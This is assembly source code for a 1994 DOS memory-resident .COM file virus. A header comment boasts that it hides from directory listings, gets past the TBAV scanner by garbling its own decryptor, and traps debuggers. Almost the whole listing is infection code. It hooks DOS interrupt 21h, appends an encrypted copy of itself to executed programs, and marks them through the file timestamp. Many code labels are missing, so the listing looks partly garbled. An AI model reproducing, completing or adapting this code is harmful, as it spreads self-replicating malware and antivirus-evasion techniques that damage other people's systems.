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; =======================================================================>
; 100% By MnemoniX - 1994
; This is a memory resident .COM infector which hides itself using
; directory stealth (11/12 and 4E/4F). To avoid setting heuristic
; flags in TBAV, it overwrites part of the decryption routine with
; garbage and adds instructions to repair it on the header of the
; program. Runs through TBAV flawlessly. Examine it in action and
; observe for yourself.
; This virus also includes debugger traps to thwart tracing.
; =======================================================================>
PING equ 30F4h ; give INT 21 this value ...
PONG equ 0DEADh ; if this returns we're res.
ID equ '%0' ; ID marker
HEADER_SIZE equ 22 ; 22 - byte .COM header
MARKER equ 20 ; marker at offset 20
code segment byte public 'code'
org 100h
assume cs:code
db 17 dup (90h) ; simulate infected program
jmp virus_begin ; a real host program will
dw ID ; have some MOVs at the
db 0CDh,20h ; beginning
db 20 dup(90h)
db 0BBh ; mov bx,offset viral_code
code_offset dw offset virus_code
db 0B8h ; mov ax,cipher
cipher dw 0
mov cx,VIRUS_SIZE / 2 + 1 ; mov cx,length of code
xor [bx],ax ; in real infections,
ror ax,1 ; portions of this code
inc bx ; will be replaced with
inc bx ; dummy bytes, which will be
loop decrypt ; fixed up by the header.
; this complicates scanning
call $+3 ; BP is instruction pointer
pop bp
sub bp,offset $-1
xor ax,ax ; anti-trace ...
mov es,ax ; set interrupts 0-3 to point
mov di,ax ; to The Great Void in high
dec ax ; memory ...
mov cl,8
rep movsw
mov ax,PING ; test for residency
int 21h
cmp bx,PONG
je installed
in al,21h ; another anti-debugger
xor al,2 ; routine ... lock out
out 21h,al ; keyboard
xor al,2
out 21h,al
mov ax,ds ; not resident - install
dec ax ; ourselves in memory
mov ds,ax
sub word ptr ds:[3],(MEM_SIZE + 15) / 16 + 1
sub word ptr ds:[12h],(MEM_SIZE + 15) / 16 + 1
mov ax,ds:[12h]
mov ds,ax
sub ax,15
mov es,ax
mov byte ptr ds:[0],'Z'
mov word ptr ds:[1],8
mov word ptr ds:[3],(MEM_SIZE + 15) / 16
push cs ; now move virus into memory
pop ds
mov di,100h
mov cx,(offset virus_end - offset start) / 2
lea si,[bp + offset start]
rep movsw
xor ax,ax ; change interrupt 21 to point
mov ds,ax ; to ourselves
mov si,21h * 4
mov di,offset old_int_21 ; (saving original int 21)
mov word ptr ds:[si - 2],0 ; anti-trace - temporarily
; kill int 21
mov ds:[si - 4],offset new_int_21
mov ds:[si - 2],es
push cs ; restore segregs
push cs
pop ds
pop es
lea si,[bp + offset host] ; and restore original
mov di,100h ; bytes of program
push di
rep movsb
ret ; and we're done
; Interrupt 21 handler - trap file execute, search, open, read, and
; moves to the end of the file.
call dword ptr cs:[old_int_21]
cmp ax,30F4h ; residency test?
je test_pass ; yes ....
cmp ax,4B00h ; file execute?
jne stealth
jmp execute ; yes, infect ...
cmp ah,11h ; directory stealth
je dir_stealth_1
cmp ah,12h
je dir_stealth_1
cmp ah,4Eh ; more directory stealth
je dir_stealth_2
cmp ah,4Fh
je dir_stealth_2
db 0EAh ; never mind ...
old_int_21 dd 0
call int_21 ; get real DOS version
mov bx,PONG ; and give pass signal
call int_21 ; perform directory search
cmp al,-1 ; no more files?
jne check_file
iret ; no, skip it
push ax bx es ; check file for infection
mov ah,2Fh
int 21h
cmp byte ptr es:[bx],-1 ; check for extended FCB
jne no_ext_FCB
add bx,7
cmp word ptr es:[bx + 9],'OC'
jne fixed ; not .COM file, ignore
mov ax,word ptr es:[bx + 17h]
and al,31 ; check seconds -
cmp al,26 ; if 52, infected
jne fixed
sub word ptr es:[bx + 1Dh],VIRUS_SIZE + HEADER_SIZE
sbb word ptr es:[bx + 1Fh],0
pop es bx ax
call int_21 ; perform file search
jnc check_file_2 ; if found, proceed
retf 2 ; nope, leave
push ax bx si es
mov ah,2Fh ; find DTA
int 21h
xor si,si ; verify that this is a .COM
cmp byte ptr es:[bx + si],'.'
je found_ext
inc si
jmp find_ext
cmp word ptr es:[bx + si + 1],'OC'
jne fixed_2 ; if not .COM, skip
mov ax,word ptr es:[bx + 16h]
and al,31 ; check for infection marker
cmp al,26
jne fixed_2 ; not found, skip
sub word ptr es:[bx + 1Ah],VIRUS_SIZE + HEADER_SIZE
sbb word ptr es:[bx + 1Ch],0
pop es si bx ax ; done
retf 2
push ax bx cx dx di ds es ; file execute ... check
; if uninfected .COM file,
mov ax,3D00h ; and if so, infect
call int_21
jnc read_header
jmp exec_exit ; can't open, leave
xchg ax,bx
push bx ; save file handle
mov ax,1220h ; get system file table
int 2Fh ; entry
nop ; remove this if you don't
; mind scanning as [512] under
; SCAN ...
mov bl,es:[di] ; get number of the SFT
mov ax,1216h ; for this handle
int 2Fh ; ES:DI now points to SFT
pop bx
mov word ptr es:[di + 2],2 ; change open mode to R/W
push word ptr es:[di + 13] ; save file date
push word ptr es:[di + 15] ; and file time
mov ax,word ptr es:[di + 11h]
cmp ax,62579 - VIRUS_SIZE ; too big?
je exec_close
cmp ax,22 ; too small?
jb exec_close
add ax,HEADER_SIZE - 3 ; calculate virus offset
push cs
pop ds
mov ds:virus_offset,ax
mov ah,3Fh ; read header of file
mov cx,HEADER_SIZE ; to check for infection
mov dx,offset read_buffer
call int_21
cmp word ptr ds:read_buffer,'ZM'
je exec_close ; don't infect .EXE
cmp word ptr ds:read_buffer[MARKER],ID ; if infected
je exec_close ; already, skip it
mov ax,4202h ; move to end of file
call move_ptr_write
mov dx,offset read_buffer ; and save header
call int_21
call encrypt_code ; encrypt the virus code
call create_header ; and create unique header
mov ah,40h
mov cx,VIRUS_SIZE ; write virus code to file
mov dx,offset encrypt_buffer
int 21h
mov ax,4200h ; back to beginning of file
call move_ptr_write
mov dx,offset new_header ; write new header
call int_21
pop dx ; restore file date & time
pop cx
and cl,0E0h ; but with timestamp
or cl,26
mov ax,5701h
int 21h
mov ah,3Eh ; close file
int 21h
pop es ds di dx cx bx ax
jmp int_21_exit
cwd ; move file pointer
xor cx,cx
int 21h
mov cx,HEADER_SIZE ; and prepare for write
mov ah,40h ; to file
pop ax ax ; clean off stack
mov ah,3Eh ; and close
int 21h
jmp exec_exit
encrypt_code proc near
push si es
push cs
pop es
xor ah,ah ; get random no.
int 1Ah ; and store in decryption
mov cipher,dx ; module
mov ax,ds:virus_offset
add ax,DECRYPTOR_SIZE + 103h
mov code_offset,ax
mov si,offset virus_begin ; first store header
mov di,offset encrypt_buffer
rep movsb ; (unencryted)
mov cx,ENCRYPTED_SIZE / 2 + 1 ; now encrypt & store code
lodsw ; simple encryption routine
xor ax,dx
ror dx,1
loop encrypt
pop es si
encrypt_code endp
create_header proc near
mov ax,ds:virus_offset ; fix up addresses in new
add ax,103h + (offset decrypt - offset virus_begin)
mov ds:mov_1,ax ; header
inc ax
inc ax
mov ds:mov_2,ax
xor ah,ah ; fill in useless MOVs
int 1Ah ; with random bytes
mov ds:mov_al,cl
mov ds:mov_ax,dx
push es cs
pop es
mov di,offset encrypt_buffer
add di,offset decrypt - offset virus_begin
mov ax,dx ; now fill decryption module
neg ax ; with some garbage
rol ax,1
pop es
sub word ptr ds:virus_offset,17 ; fix up JMP instruction
ret ; done
create_header endp
new_header db 0C7h,06
mov_1 dw 00
db 31h,07 ; first MOV 6
db 0B0h
mov_al db 00 ; a nothing MOV AL, 2
db 0C7h,06
mov_2 dw 00
db 0D1h,0C8h ; second MOV 6
db 0B8h
mov_ax dw 00 ; a nothing MOV AX, 3
db 0E9h ; jump instruction 1
virus_offset dw 0 ; virus offset 2
dw ID ; ID marker 2
; total bytes = 22
sig db '[100%] By MnemoniX 1994',0
VIRUS_SIZE equ offset virus_end - offset virus_begin
read_buffer dw HEADER_SIZE dup (?) ; storage for orig header
encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus
MEM_SIZE equ offset heap_end - offset start
DECRYPTOR_SIZE equ offset virus_code - offset virus_begin
ENCRYPTED_SIZE equ offset virus_end - offset virus_code
code ends
end start